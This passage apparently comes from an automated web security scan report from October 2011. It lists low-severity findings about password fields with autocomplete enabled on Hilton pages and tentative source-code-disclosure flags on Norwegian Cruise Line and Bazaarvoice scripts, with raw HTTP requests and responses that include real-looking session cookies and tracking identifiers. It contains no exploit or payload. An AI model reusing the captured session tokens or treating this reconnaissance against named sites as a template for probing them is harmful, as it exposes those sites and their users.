...[SNIP]...
<div id="myreservations" style="display:none;">
           
           
                                                                           <form name="myForm" id="myForm" method="post">
               <div class="containReservationsOptions">
...[SNIP]...
</label><input id="Password_myRes" tabindex="9" name="password" class="frmTextMed" type="password">
                       </fieldset>
...[SNIP]...
13.31. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13 HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=319CB0B01F8515F2F0E1B160FF93B9BA.etc13; Path=/
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:10 GMT;path=/
Content-Length: 57805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<div id="myreservations" style="display:none;">
           
           
                                                                           <form name="myForm" id="myForm" method="post">
               <div class="containReservationsOptions">
...[SNIP]...
</label><input id="Password_myRes" tabindex="9" name="password" class="frmTextMed" type="password">
                       </fieldset>
...[SNIP]...
13.32. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.33. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 59059
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; Path=/
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en_US
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.34. http://www1.hilton.com/en_US/hi/sitemap/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/sitemap/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:47 GMT;path=/
Content-Length: 36912


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.35. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.tst=0.840; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635669022:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44413
Date: Mon, 03 Oct 2011 12:54:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</div>
               <form id="frmSignin" action="https://secure3.hilton.com/en_US/hi/customer/login/index.htm" method="post" onsubmit="return validateLoginForm(this, 'UsernameHHonors', 'PasswordPIN');">                    
                   <input id="loginPageTitle" name="loginPageTitle" type="hidden" value="Hotel Search - Hilton"/>
...[SNIP]...
</label>
                       <input id="PasswordPIN" name="password" class="frmTextSignin" tabindex="5" type="password" value=""/>
                       <a href="https://secure3.hilton.com/en_US/hi/customer/login/forgotPassword.htm">
...[SNIP]...
13.36. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 257222
Date: Mon, 03 Oct 2011 12:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</div>
               <form id="frmSignin" action="https://secure3.hilton.com/en_US/hi/customer/login/index.htm" method="post" onsubmit="return validateLoginForm(this, 'UsernameHHonors', 'PasswordPIN');">                    
                   <input id="loginPageTitle" name="loginPageTitle" type="hidden" value="Search Results - Hilton"/>
...[SNIP]...
</label>
                       <input id="PasswordPIN" name="password" class="frmTextSignin" tabindex="5" type="password" value=""/>
                       <a href="https://secure3.hilton.com/en_US/hi/customer/login/forgotPassword.htm">
...[SNIP]...
13.37. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 257222
Date: Mon, 03 Oct 2011 12:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div id="modal_content" class="id-modal_content">
                   <form id="login_form" class="id-login_form" action="https://secure3.hilton.com/en_US/hi/search/findhotels/login.htm" method="post">
                       <span id="username_box" class="id-username_box">
...[SNIP]...
wordPIN-modal').className='show-input id-PasswordPIN';document.getElementById('PasswordPIN-modal').focus();"
                               class="show-input clear id-PasswordPINT" id="PasswordPINT" tabindex="3" />
                           <input id="PasswordPIN" name="password" class="hide-input clear id-PasswordPIN" tabindex="3" onblur="javascript:if(this.value==''){this.className='hide-input clear';document.getElementById('PasswordPINT-modal').value='Password or HHonors PIN';document.getElementById('PasswordPINT-modal').className='show-input clear id-PasswordPINT';}" type="password" value=""/>

                           <a href="/en_US/hi/search/findhotels/forgotPassword.htm" tabindex="5" title="Forgot Your Sign In or Password?">
...[SNIP]...
14. Source code disclosure  previous  next
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

14.1. http://opentable.ugc.bazaarvoice.com/module/0938/cmn/0938/display.pkg.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://opentable.ugc.bazaarvoice.com
Path:   /module/0938/cmn/0938/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/0938/cmn/0938/display.pkg.js HTTP/1.1
Host: opentable.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://reviews.opentable.com/0938/200/reviews.htm?format=embedded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Mon, 03 Oct 2011 08:10:13 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 112235
Cache-Control: max-age=1206
Expires: Mon, 03 Oct 2011 13:15:01 GMT
Date: Mon, 03 Oct 2011 12:54:55 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...
14.2. http://www.ncl.com/nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ncl.com
Path:   /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:07:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 488086
Cache-Control: max-age=174409
Expires: Wed, 05 Oct 2011 13:15:13 GMT
Date: Mon, 03 Oct 2011 12:48:24 GMT
Connection: close


//web/script/min/yui-functional-0.4.0-min.js

YAHOO.lang.augmentObject(YAHOO.namespace("YAHOO.util.Functional"),{each:function(j,g,f){var b=0;try{if(j.forEach){j.forEach(g,f)}else{if(j.length){for(va
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
14.3. https://www.ncl.com/nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.ncl.com
Path:   /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /nclweb/script/min/0036eeea40554961f08f1ea5f3203dd8.js HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:07:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 488086
Expires: Wed, 05 Oct 2011 13:12:07 GMT
Date: Mon, 03 Oct 2011 12:51:29 GMT
Connection: keep-alive


//web/script/min/yui-functional-0.4.0-min.js

YAHOO.lang.augmentObject(YAHOO.namespace("YAHOO.util.Functional"),{each:function(j,g,f){var b=0;try{if(j.forEach){j.forEach(g,f)}else{if(j.length){for(va
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
14.4. http://www2.ncl.com/sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Oct 2011 22:30:41 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 615144
Cache-Control: max-age=26729
Expires: Mon, 03 Oct 2011 20:13:10 GMT
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
14.5. http://www2.ncl.com/sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 02 Oct 2011 19:31:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 639880
Cache-Control: max-age=51103
Expires: Tue, 04 Oct 2011 03:02:59 GMT
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
14.6. http://www2.ncl.com/sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
